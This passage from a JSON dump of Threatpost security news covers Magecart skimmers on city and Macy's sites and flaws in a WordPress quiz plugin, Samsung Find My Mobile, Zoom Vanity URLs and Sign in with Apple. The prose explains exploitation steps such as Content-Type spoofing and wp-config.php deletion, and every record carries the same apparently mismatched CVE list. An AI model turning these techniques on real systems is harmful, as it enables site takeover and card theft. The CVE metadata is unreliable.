Click2Gov website,\u201d said researchers with Trend Micro in a [Friday analysis](<https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/>). \u201cJavaScript code was injected into the payment page which loads a credit card skimmer when victims browse the payment page.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe skimmer is extremely simple; no obfuscation or anti-debugging techniques were used. It hooks the \u201csubmit\u201d event of the payment form, so that when a victim clicks the button to submit their payment information, the skimmer will grab the information from the selected columns inside the payment form and immediately send the collected information to a remote server via a HTTP POST request.\n\nCybercriminals targeted the credit-card information (including card number, expiration date and CVV), name and contact address for the website users.\n\n\u201cWe were able to identify two of the exfiltration servers used in the attack,\u201d said researchers. \u201cBoth hosted the actual JavaScript skimmer, as well as a .JSP file used to receive the exfiltrated data. One of the servers was used for three sites, while the other server used for the remaining five sites. The two skimmers used are identical, save for the change in the hostname of the exfiltration servers.\u201d\n\nWhen asked if any of the skimmers have been removed from the websites, researchers told Threatpost, \u201cWe don\u2019t have access to that information.\u201d However, they believe that these attacks started on April 10 of this year, and are still active.\n\nWhen asked which city websites were affected in this incident, researchers told Threatpost, \u201cWe can\u2019t say,\u201d adding that Trend Micro \u201cprioritizes responsible disclosure of security incidents and chooses not to \u2018name and shame\u2019 victims. Our primary goal is to help organizations identify and mitigate these incidents. We have notified the breached parties who will be responsible for handling the situation within each city.\u201d\n\n## **Previous Click2Gov Breaches**\n\nClick2Gov was previously afflicted by a vulnerability (rooted in a compromised Click2Gov webserver) that led to two different data breaches of the websites of several towns and cities using the software.\n\nThe flaw was first discovered in [December 2018](<https://threatpost.com/payment-card-breach-hits-8-cities-using-vulnerable-bill-portal/148521/>) after continual breaches of it led to the compromise of at least 294,929 payment cards across the country. Overall, 46 confirmed impacted local governments were caught up in this first breach \u2013 including Saint Petersburg, Fla. (on October 2) Bakersfield, Calif. (November 14), and Ames, Iowa (December 2).\n\n[T](<https://threatpost.com/patched-click2gov-flaw-still-afflicting-local-govs/140109/>)[hen in 2019](<https://threatpost.com/patched-click2gov-flaw-still-afflicting-local-govs/140109/>), the vulnerable municipality payment software was targeted once again, this time part of a breach involving of eight cities in August. Those cities were: Coral Springs, Deerfield Beach, Milton and Palm Bay, Fla.; Bakersfield Calif.; Pocatello, Idaho; Broken Arrow, Okla.; and Ames, Iowa.\n\nThough they did not name the affected cities in this most recent security incident, researchers said that five of the eight cities were also affected in the previous breaches.\n\nA patch was issued for the Click2Gov vulnerability in 2017, but researchers said that the 2018 and 2019 breaches may have stemmed from municipalities not updating their systems.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/26144049/click2gov-1.png>)However, researchers say, based on an analysis of both the skimmer and the infrastructure, they could not find any connections between this most recent breach and the incidents in 2018 and 2019.\n\n\u201cIt is not clear at this time if this attack which we identified is connected to the earlier breaches, since nothing about their technical details indicate a connection,\u201d said researchers. \u201cThe only connection is that five of the affected cities in the current incident were also affected in 2018; while two were included in the 2019 incident.\u201d\n\nThe Click2Gov software was developed by Superion, which has since [merged](<https://centralsqr.com/press-release/>) with other companies to form a new company called CentralSquare Technologies in July 2018. According to Risk Based Security, there appears to be between 600 to 6,000 installations of Click2Gov indexed.\n\nCentralSquare Technologies did not return a request for comment from Threatpost.\n\nRegardless, the incident show that credit card skimming attacks are still a major threat to online merchants. Magecart in particular has targeted various websites, from the [Nutribullet website](<https://threatpost.com/magecart-cyberattack-targets-nutribullet-website/153855/>) to an [Olympics ticket reseller](<https://threatpost.com/olympic-ticket-survival-sites-hit-by-cyberattack/152648/>). And in April, researchers [observed a new skimmer](<https://threatpost.com/emerging-makeframe-skimmer-magecart-smbs/154374/>) from the Magecart Group actively harvesting payment-card data from 19 different victim websites, mainly belonging to small- and medium-sized businesses (SMBs), for several months.\n\n\u201cDuring 2019, we also saw that [academic institutions](<https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/>) and hotel chains were targeted by similar attacks. This time, the attacker targeted the websites of various local governments,\u201d said Trend Micro researchers.\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-26T20:18:06", "type": "threatpost", "title": "8 U.S. City Websites Targeted in Magecart Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-06-26T20:18:06", "id": "THREATPOST:A6991C9080305907C0352031B295B40D", "href": "https://threatpost.com/8-city-gov-websites-magecart/156954/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:15:15", "description": "A plugin that is designed to add quizzes and surveys to WordPress websites has patched two critical vulnerabilities. The flaws can be exploited by remote, unauthenticated attackers to launch varying attacks \u2013 including fully taking over vulnerable websites.\n\nThe plugin, [Quiz and Survey Master](<https://wordpress.org/plugins/quiz-master-next/>), is actively installed on over 30,000 websites. The two critical flaws discovered by researchers include an arbitrary file-upload vulnerability, ranking 10 out of 10 on the CVSS scale; as well as an unauthenticated arbitrary file deletion error, ranking 9.9 out of 10. A patch is available for both issues in version 7.0.1 of the plugin, said the researchers with Wordfence who discovered the flaws, [in a Thursday post](<https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/>).\n\n\u201cThe unauthenticated arbitrary file-deletion vulnerability that was present in the plugin is pretty significant,\u201d Chloe Chamberland, threat analyst with Wordfence, told Threatpost. \u201cAny of the 30,000 sites running the plugin are subject to any file being deleted (granted they are running a vulnerable version), which includes the wp-config.php file, by unauthenticated site users.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe two vulnerabilities stemmed from a feature in the plugin that enables site owners to implement file uploads as a response type for a quiz or survey. For instance, if a website has a job-application questionnaire, the feature gives users the option to upload a PDF resume at the end.\n\nResearchers found that this feature was insecurely implemented: \u201cThe check to verify file type only looked at the \u2018Content-Type\u2019 field during an upload, which could be easily spoofed,\u201d said researchers. \u201cThis meant that if a quiz contained a file upload which was configured to only accept .txt files, an executable PHP file could be uploaded by setting the \u2018Content-Type\u2019 field to \u2018text/plain\u2019 to bypass the plugin\u2019s weak checks.\u201d\n\nIn an example of a real-world attack, unauthenticated users could leverage this flaw by uploading malicious, arbitrary files, including PHP files. That would enable them to achieve remote code-execution, and ultimately, \u201cthis could lead to complete site takeover and hosting account-compromise, amongst many other scenarios,\u201d said researchers.\n\nMeanwhile, the arbitrary file-deletion error exists within the plugin\u2019s functionality for removing any files that were uploaded during the quiz. Due to AJAX actions not being authenticated in the file-deletion functionality, an unauthenticated user could delete important files \u2013 like a website\u2019s wp-config.php file. This is a core WordPress file that contains information about the database \u2013 including the name, username and password \u2013 that allows WordPress to communicate with the database to store and retrieve data.\n\n\u201cIf the wp-config.php file is deleted, WordPress assumes there is a fresh installation at which point an attacker can establish a new database connection, gain access to the site and upload a webshell to ultimately achieve persistence or infect other sites in the same hosting account,\u201d Chamberland told Threatpost.\n\nResearchers discovered the flaws on July 17, and after various unsuccessful attempts to contact the QSM plugin team, finally reached out to the plugin\u2019s parent company, ExpressTech on Aug. 1. A patch was released on Aug. 5 in version 7.0.1. The CVE assignments for both flaws are still pending, researchers said.\n\n\u201cWe highly recommend updating to version 7.0.1 immediately to keep your site protected against any attacks attempting to exploit this vulnerability,\u201d said researchers.\n\nThreatpost has reached out to ExpressTech for further commentary.\n\n**_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_, 2020 in Security: Four Stories from the New Threat Landscape__, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._**\n", "cvss3": {}, "published": "2020-08-14T18:26:07", "type": "threatpost", "title": "Critical Flaws in WordPress Quiz Plugin Allow Site Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-14T18:26:07", "id": "THREATPOST:CFF3DDE464C215A7BDD3772ADFCDA4EE", "href": "https://threatpost.com/critical-flaws-wordpress-quiz-plugin-site-takeover/158379/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-16T22:18:47", "description": "Researchers have disclosed a slew of critical-severity, patched flaws in flagship Samsung smartphones \u2013 including the Galaxy S7, S8 and S9 models. The vulnerabilities specifically stem from Samsung\u2019s [\u201cFind My Mobile\u201d](<https://findmymobile.samsung.com/>) service, a feature built into the smartphones allowing users to locate their devices if they lose them.\n\n[](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)\n\nResearchers with Char49, who discovered the four glitches, said that if a bad actor convinced a target to download a malicious application onto their device, the flaws could have been chained together to launch various, insidious attacks. These could ultimately have resulted in complete data loss for the smartphone user (via a factory reset). Attackers could also track users\u2019 real-time locations, spy on phone calls and messages, lock users out of their phones, or unlock phones.\n\nIn a real-life attack, that could mean that \u201cwhen attacked, the device can be spied on or, in the worst-case scenario, wiped clean of all its data, without the victim even perceiving what was happening, exposing the victim to situations of blackmail and extortion,\u201d said researchers with Char49 in an [analysis of the flaws](<http://char49.com/tech-reports/fmmx1-report.pdf>) [PDF].\n\nResearchers told Threatpost that the vulnerabilities were first reported to Samsung Feb. 21, 2019, and quietly fixed by the smartphone company on April 7, 2019. However, the flaws were not disclosed until this past Friday, when Char49 researchers presented them [during a DEFCON session.](<https://www.youtube.com/watch?v=qbj-4NXsE-0&feature=youtu.be&t=1495>)\n\nResearchers also told Threatpost that there are no CVEs assigned to the flaws, as Samsung opted to not disclose the issues publicly in their website. However, Samsung did issue an internal SVE to the bugs (SVE-2019-14025), which is Samsung\u2019s identification mechanism for security issues, and classified the flaws as \u201ccritical.\u201d\n\n## **The Flaws**\n\nResearchers found four vulnerabilities in total in Find My Mobile. The first issue is that it\u2019s possible for a malicious app (installed on the smartphone) to change the URL endpoints that Find My Mobile uses to communicate with the backend servers. In an attack scenario, this means that when the Find My Mobile app makes a call to the backend servers, it \u201callows an attacker to create a man-in-the middle (MiTM) scenario, monitoring Find My Mobile call to the backend and, as we will see, to manipulate them,\u201d said researchers.\n\nThe second issue stems from three \u201cexported broadcast receivers\u201d (com.sec.pcw.device.receiver.PCWReceiver ) in the service that are not protected by permissions. [Broadcast receivers](<https://developer.android.com/guide/topics/manifest/receiver-element>) enable applications to receive intents that are broadcast by the system or by other applications, even when other components of the application are not running. Researchers said, sending a broadcast with a certain action (com.samsung.account.REGISTRATION_COMPLETED) can enable the backend server URL endpoints to be updated to an attacker controlled value. That means attackers can now monitor and control traffic from Find My Mobile to the backend servers.\n\n\u201cSo now, at server side, the attacker has lots of sensitive information,\u201d said researchers. \u201cTo start, the victim coarse location via the IP address of the request, but also several PIIs [personal identifiable information], both registrationId (from the 2 requests) and the victim\u2019s IMEI. This alone allows for user tracking. The attacker also gets, among other things, device brand\u2026 and other information not important for this attack scenario. \u201d\n\nThe third flaw stems from another unprotected broadcast receiver (com.sec.pcw.device.receiver.SPPReceiver). Researchers found that an attacker could leverage this flaw by sending a broadcast with a certain action to the broadcast receiver. This results in Find My Mobile contacting the Device Management (DM) server for updates: \u201cWhen Find My Mobile contacts the DM server, the DM can reply just with an equivalent to an OK or, most importantly, the accumulated actions requested by the user and missed by Find My Mobile while the smartphone was offline. And this is where an attacker can step in. If an attacker can modify a server response to include an action of his choosing, he can tell the smartphone which action to take,\u201d said researchers.\n\nThe final flaw discovered is a glitch in ncml:auth-md5, a base64 coded string that authenticates the message from the server. Researchers found that an issue in the authentication method allows the server to accept all server replies.\n\n\u201cWe\u2019re pretty sure it was not supposed to be implemented like this,\u201d said researchers. \u201cThere is no message signing or any mechanism that prevents message modification, which is great for an attacker.\u201d\n\nResearchers formed an attack that could chain these four flaws together. By convincing a target to install a malicious app on their device (via spear phishing or by other means), these flaws can allow an attacker to carry out any action that Find My Mobile can perform.\n\n\u201cThis attack was tested successfully on different devices (Samsung Galaxy S7, S8 and S9+). The [Proof of Concept] involves an APK [Android Application Package] and the server-side code that implements the logic needed to inject actions in the server responses,\u201d said researchers.\n\nSamsung smartphones have been found to have various security issues over the past year. Last year, [Samsung rolled](<https://threatpost.com/galaxy-s10-fingerprint-sensor-thwarted-with-screen-protector-report/149197/>)[ out](<https://threatpost.com/galaxy-s10-fingerprint-sensor-thwarted-with-screen-protector-report/149197/>) a software patch for the Galaxy S10 and Note10, addressing glitches in both phone models that allow the bypass of their built-in fingerprint authentication sensors.[ Also in 2019,](<https://threatpost.com/samsung-lg-android-spearphone-eavesdropping/146625/>) a new way to eavesdrop on people\u2019s mobile phone calls was uncovered after researchers unveiled an attack making use of Android devices\u2019 on-board accelerometers (motion sensors) to infer speech from the devices\u2019 speakers.\n\nThreatpost has reached out to Samsung for commented on the patched flaws.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-11T14:48:41", "type": "threatpost", "title": "Samsung Quietly Fixes Critical Galaxy Flaws Allowing Spying, Data Wiping", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-11T14:48:41", "id": "THREATPOST:E9212954E31E4447FD755C9E210A641F", "href": "https://threatpost.com/samsung-quietly-fixed-critical-galaxy-flaws-allowing-spying-data-wiping/158241/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:16:33", "description": "A previously undisclosed bug in Zoom\u2019s customizable URL feature has been addressed that could have offered a hacker a perfect social-engineering avenue for stealing credentials or sensitive information.\n\nDisclosed by Zoom and Check Point on Thursday, the security flaw existed in the \u201cVanity URL\u201d feature for Zoom, which allows companies to set up their won Zoom meeting domain, i.e. \u201cyourcompany.zoom.us.\u201d Companies can add customized logos and branding to the page, and end users access the page and click meeting links within that page to connect to a Zoom call. Aside from the convenience driver for setting it up, the feature is also required for configuration if users want to turn on Single Sign On for the video service.\n\nTo mount an attack, cybercriminals would pose as a legitimate employee in a company, and then send a meeting invitation ostensibly from an organization\u2019s Vanity URL to intended victims \u2013 customers, partners, suppliers and so on. However, the attackers would actually be using an invitation URL that included a registered sub-domain of their choice \u2013 not the real Vanity URL of the spoofed company.\n\n\u201cIn other words, if the original link was https://zoom.us/j/##########, the attacker could change it to https://&lt;organization\u2019s name&gt;.zoom.us/j/##########,\u201d according to [an analysis](<https://blog.checkpoint.com/2020/07/16/fixing-the-zoom-vanity-clause-check-point-and-zoom-collaborate-to-fix-vanity-url-issue/>) from Check Point issued Thursday. \u201cWithout particular cybersecurity training on how to recognize the appropriate URL, a user receiving this invitation may not recognize that the invitation was not genuine or issued from an actual or real organization.\u201d\n\nA second way to initiate an attack would be to target dedicated Zoom web interfaces.\n\n\u201cSome organizations have their own Zoom web interface for conferences,\u201d according to Check Point. \u201cA hacker could target such an interface and attempt to redirect a user to enter a meeting ID into the malicious Vanity URL rather than the actual or genuine Zoom web interface. As with the direct links attacks, without careful cybersecurity training, a victim of such attacks may not have been able to recognize the malicious URL and have fallen prey to the attack.\u201d\n\nUltimately, once in the meeting, the attacker could continue to pose as a company employee, and proceed to extract credentials and sensitive information, as well as carry out other fraud actions, by asking certain questions or requesting that materials be sent over.\n\nCheck Point didn\u2019t release technical details of the bug, but did note that \u201cThere are several ways to enter a meeting containing a sub-domain, including using a direct sub-domain link containing the meeting ID, or using the organization\u2019s customized sub-domain web UI.\u201d\n\nZoom has fixed the issue on its end, closing the exploit capability off. Researchers at Check Point told Threatpost that they aren\u2019t aware of in-the-wild attacks prior to the fix.\n\n\u201cZoom has addressed the issue reported by Check Point and put additional safeguards in place for the protection of its users,\u201d a Zoom spokesperson told Threatpost, adding that the firm did not consider the issue a zero-day bug. The person went on, \u201cZoom encourages its users to thoroughly review the details of any meeting they plan to attend prior to joining, and to only join meetings from users they trust. We appreciate Check Point notifying us of this issue. If you think you\u2019ve found a security issue with Zoom products, please send a detailed report to security@zoom.us.\u201d\n\n\u201cBecause Zoom has become one of the world\u2019s leading communication channels for businesses, governments and consumers, it\u2019s critical that threat actors are prevented from exploiting Zoom for criminal purposes,\u201d added Adi Ikan, group manager at Check Point, in a statement to media.\n\nThe firm noted in its analysis that while the video conferencing service was already popular before the pandemic, in the \u2018new normal\u2019 of social distancing it has \u201cbecome the go-to platform globally for everything from high-level government and business meetings, to university and school classes, to family gatherings \u2013 meaning that Zoom usage has soared from 10 million daily meeting participants back in December 2019 to over 300 million in April 2020.\u201d\n\n## Zoom Security Parade Continues\n\nZoom continues to face security issues, even as hackers continue to probe the platform for weaknesses.\n\nLast week, the popular video service [patched a zero-day bug](<https://threatpost.com/unpatched-zoom-bug-rce/157317/>) in the Zoom Client for Windows that could have allowed remote code-execution. It impacted users of legacy versions of Windows, but was trivial to exploit, researchers said.\n\nAnd in April, it addressed [two zero-day flaws](<https://threatpost.com/two-zoom-zero-day-flaws-uncovered/154337/>) that were uncovered in Zoom\u2019s macOS client version, which could have given local, unprivileged attackers root privileges, and allowed them to access victims\u2019 microphone and camera. And also in April, several new databases [were uncovered on underground forums](<https://threatpost.com/troves-of-zoom-credentials-shared-on-hacker-forums/155163/>) sharing troves of recycled Zoom credentials.\n\nIn January, Zoom issued a [bevy of security fixes](<https://threatpost.com/zoom-fixed-flaw-opening-meetings-to-hackers/152266/>) after it came to light that the company\u2019s platform used weak authentication that made it possible for adversaries to join active meetings. The issues stemmed from Zoom\u2019s conference meetings not requiring a \u201cmeeting password\u201d by default.\n\nIn March and April, there were widespread reports of \u201cZoom-bombing,\u201d where trolls were [hijacking online meetings](<https://threatpost.com/fbi-threatens-zoom-bombing-trolls-with-jail-time/154495/>) in order to spread hate speech such as racist messages, threats of sexual harassment and pornographic images, which drove meeting participants offline or forced meetings to be abruptly cancelled.\n\nOther woes have also plagued the company, having to do with privacy. Zoom this spring [nixed a feature](<https://threatpost.com/zoom-removes-data-mining-linkedin-feature/154404/>) that came under fire for \u201cundisclosed data mining\u201d of users\u2019 names and email addresses, used to match them with their LinkedIn profiles. It also [removed a feature](<https://threatpost.com/zoom-kills-ios-apps-data-sharing-facebook/154275/>) in its iOS web conferencing app that was sharing analytics data with Facebook, after a report revealing the practice sparked outrage.\n\nMeanwhile, crooks will continue to target the platform, according to Check Point.\n\n\u201cIt\u2019s no surprise that the explosive growth in Zoom usage has been matched by an increase in new domain registrations with names including the word \u2018Zoom\u2019, indicating that cybercriminals are targeting Zoom domains as phishing bait to lure victims,\u201d the firm\u2019s analysis noted. \u201cWe have also detected malicious files impersonating Zoom\u2019s installation program.\u201d\n", "cvss3": {}, "published": "2020-07-16T16:14:17", "type": "threatpost", "title": "Zoom Addresses Vanity URL Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-07-16T16:14:17", "id": "THREATPOST:E07387431E59AD0A09420F7EFA295856", "href": "https://threatpost.com/zoom-vanity-url-zero-day/157510/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:28:51", "description": "The department store Macy\u2019s is warning that web skimmer malware was discovered on Macys.com collecting customers\u2019 payment card information. The attack [has been linked to Magecart](<https://www.bleepingcomputer.com/news/security/macys-customer-payment-info-stolen-in-magecart-data-breach/>), a notorious umbrella group made up of various cybercriminal affiliates that is known for injecting payment card skimmers into ecommerce websites.\n\nAccording to a data breach notice sent to customers, \u201can unauthorized third party added unauthorized computer code\u201d to Macys.com on Oct. 7. The code, which was discovered and removed on Oct. 15, was collecting customers\u2019 first and last names, addresses, phone number and email addresses, payment card information (including number, security code, and expiration dates).\n\n\u201cThere is no reason to believe that this incident could be used by cybercriminals to open new accounts in your name. Nonetheless, you should remain vigilant for incidents of financial fraud and identify theft by regularly reviewing your account statements and immediately reporting any suspicious activity to your card issuer,\u201d said Macy\u2019s in its data [breach notice.](<https://www.documentcloud.org/documents/6552530-MACY-S-NOTICE-OF-DATA-BREACH.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe way web skimmer work is that they are injected by hackers into targeted websites and are designed to steal data entered into online payment forms on e-commerce websites. When a visitor goes to that website, popular skimmers \u2013 such as [Pipka](<https://threatpost.com/pipka-card-skimmer-removes-itself-after-infecting-ecommerce-sites/150341/>) or [Inter](<https://www.fortinet.com/blog/threat-research/inter-skimmer-for-all.html>) \u2013 will then scoop up personal details entered on the site.\n\nThe web skimmer that affected Macys.com target two company controlled web pages \u2013 the checkout page of the website and the My Wallet page. the My Wallet page allows customers to manage and use payment options, promotions, savings passes and can be accessed in their accounts. Macy\u2019s said that customers who checked out with the My Account wallet page on a mobile device or on the Macy\u2019s mobile application were not impacted.\n\n\u201cWe are aware of a data security incident involving a small number of our customers on Macys.com,\u201d a Macy\u2019s spokesperson told Threatpost. \u201cWe have investigated the matter thoroughly, addressed the cause and have implemented additional security measures as a precaution. All impacted customers have been notified, and we are offering consumer protections to these customers at no cost.\u201d\n\nHowever, the attack surface could be huge. Macys.com has topped the list of retail apparel websites in terms of traffic traffic in 2019. In an April analysis of U.S. retail apparel site rankings, [SimilarWeb cited Macys.com](<https://wwd.com/business-news/retail/similarweb-retail-list-1203118893/>) as number one with more than 55.7 million monthly visits.\n\nAn anonymous researcher [reportedly](<https://www.bleepingcomputer.com/news/security/macys-customer-payment-info-stolen-in-magecart-data-breach/>) linked the attack back to the Magecart group, an infamous [loose affiliation of attack groups](<https://threatpost.com/podcast-breaking-down-the-magecart-threat-part-two/139534/>) responsible for payment-card attacks on organizations from [Forbes](<https://threatpost.com/magecart-card-skimmer-forbes/144811/>) to [First Aid Beauty](<https://threatpost.com/magecart-attack-skin-care-site/149580/>). The researcher told Bleeping Computer that attackers altered the affected Macy\u2019s web pages to include obfuscated Magecart script.\n\nMacy\u2019s consumers who are impacted should monitor their credit card statements for fraud-related activity. The company is also offering victims a free year of the Experian IdentityWorks credit monitoring service.\n\n\u201cWe quickly contacted federal law enforcement and brought in a leading class forensics firm to assist our investigation,\u201d said Macy\u2019s. \u201cWe have reported the relevant payment card numbers to the card brands (i.e. Visa, Mastercard, American Express and Discover). In addition, we have taken steps that we believe are designed to prevent this type of unauthorized code from being added to Macys.com.\u201d\n\nHowever, security pundits argue that retailers like Macy\u2019s need to be better in ramping up extra security measures against web skimmer attacks proactively \u2013 particularly as companies like [Ticketmaster](<https://threatpost.com/ticketmaster-chat-feature-leads-to-credit-card-breach/133191/>), [Forbes](<https://threatpost.com/magecart-card-skimmer-forbes/144811/>), [British Airways](<https://threatpost.com/magecart-group-pinned-in-recent-british-airways-breach/137338/>), [Newegg](<https://threatpost.com/magecart-strikes-again-siphoning-payment-info-from-newegg/137576/>) continue making headlines for Magecart-related breaches.\n\n\u201cMageCart is not a mystery, by now, one might think that \u2018additional security measures\u2019 would be added to all websites as a matter of course, before hackers drop in some malicious code,\u201d said Colin Bastable, CEO of Lucy Security, in an email. \u201cThat is the definition of a precaution. Macy\u2019s has implemented what should be described as a security postcaution.\u201d\n\nSecurity experts for their part urge the importance of established policies for verifying that internet-facing infrastructure is securely configured and patched \u2013 particularly for retailers as the holidays loom.\n\n\u201cHaving strong and robust third-party policies to restrict external access to sensitive information and only allow verified code or scripts to be executed will greatly reduce exposure,\u201d James McQuiggan, security awareness advocate at KnowBe4, said in an email.\n\n\u201cAnd if a breach does occur, the attacker\u2019s opportunity to get data is severely impeded,\u201d he said. \u201cMacy\u2019s customers should pay extra attention to emails sent to them regarding the Macy\u2019s breach, as criminals will leverage the attack to get them to click on phishing links for false sites or open attachments that contain malicious software.\u201d\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n\n**Share this article:**\n\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Web Security](<https://threatpost.com/category/web-security/>)\n", "cvss3": {}, "published": "2019-11-19T14:56:38", "type": "threatpost", "title": "Macy's Suffers Data Breach by Magecart Cybercriminals", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-11-19T14:56:38", "id": "THREATPOST:76BC8D329A74BD12883D2CEFFA552A54", "href": "https://threatpost.com/macys-data-breach-linked-to-magecart/150393/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:19:05", "description": "A researcher recently found a critical Apple vulnerability that, if exploited, could enable remote attackers to abuse the \u201cSign in with Apple\u201d feature to take over victims\u2019 third-party application accounts. The security researcher, Bhavuk Jain, reported the flaw to Apple via its bug bounty program, and was awarded $100,000 for the find.\n\nThe flaw stemmed from the \u201c[Sign in with Apple](<https://developer.apple.com/sign-in-with-apple/>)\u201d feature, which was introduced by Apple at its Worldwide Developers Conference last year. Sign in with Apple aimed to make it easy and secure for Apple users to sign into third-party apps and websites. It did this by implementing an Apple-backed authentication system to replace social logins on third-party services.\n\n\u201cIn the month of April, I found a zero-day in Sign in with Apple that affected third-party applications which were using it and didn\u2019t implement their own additional security measures,\u201d said Jain, [in his disclosure of the bug on Sunday](<https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple/>). \u201cThis bug could have resulted in a full account takeover of user accounts on that third party application irrespective of a victim having a valid Apple ID or not.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nApple has since fixed the flaw. Threatpost has reached out to Apple for further comment.\n\nOne of the highlights of Sign in with Apple is that users could sign up with third-party services without needing to disclose their Apple ID email address to these services. This worked because Sign in with Apple would first validate users on the client side, and then initiate a JSON Web Token (JWT) request from Apple\u2019s authentication services. This JWT would then be used by the third-party app to confirm the user\u2019s identity.\n\nThe issue was that after Apple validated the user on the client side via their Apple ID email address, it did not verify that the JWT request was from that actual user account. An attacker could abuse this flaw by providing an Apple ID email that belongs to the victim and tricking Apple servers into generating a valid JWT payload. Once an attacker does this, he can then sign into a third-party app using the victim\u2019s identity.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/01105057/flow_apple_auth.png>)\n\nCredit: Bhavuk Jain\n\n\u201cI found I could request JWTs for any Email ID from Apple and when the signature of these tokens was verified using Apple\u2019s public key, they showed as valid,\u201d he said. \u201cThis means an attacker could forge a JWT by linking any Email ID to it and gaining access to the victim\u2019s account.\u201d\n\nAccording to [The Hacker News](<https://thehackernews.com/2020/05/sign-in-with-apple-hacking.html>), the flaw could be exploited even if users had decided to hide their email IDs from third-party services. It could also be exploited to sign up new accounts with victims\u2019 Apple IDs.\n\nThere are two hoops that attackers would need to jump through to make this exploit work. First, they would need an email ID for an Apple user \u2013 though that could be any Apple user\u2019s email ID. Second, they would need to log into a third-party app via Sign in with Apple that didn\u2019t require any further security measures.\n\nJain said the impact of this vulnerability is \u201cquite critical\u201d as it could allow full account takeover. Many developers have integrated Sign in with Apple into their services, including Dropbox, Spotify, Airbnb, and Giphy.\n\n\u201cThese applications were not tested but could have been vulnerable to a full account takeover if there weren\u2019t any other security measures in place while verifying a user,\u201d Jain said.\n\nJain said that Apple conducted an investigation of their logs and determined there was no misuse or account compromise due to this vulnerability. The researcher found the flaw in April and reported it via Apple\u2019s bug bounty program which earned him $100,000. Threatpost has reached out to Jain for further details on the timeline of discovering and reporting the flaw.\n\n[Apple in December 2019](<https://threatpost.com/apples-bug-bounty-opens-1m-payout/151334/>) opened up its historically private bug-bounty program to the public, bolstering its top payout to $1 million, in an effort to weed out serious vulnerabilities. Another Apple flaw recently [disclosed in April](<https://threatpost.com/apple-safari-flaws-webcam-access/154476/>) earned a bug bounty hunter $75,000 for finding Safari flaws that could be exploited to snoop on iPhones, iPads and Mac computers using their microphones and cameras.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, 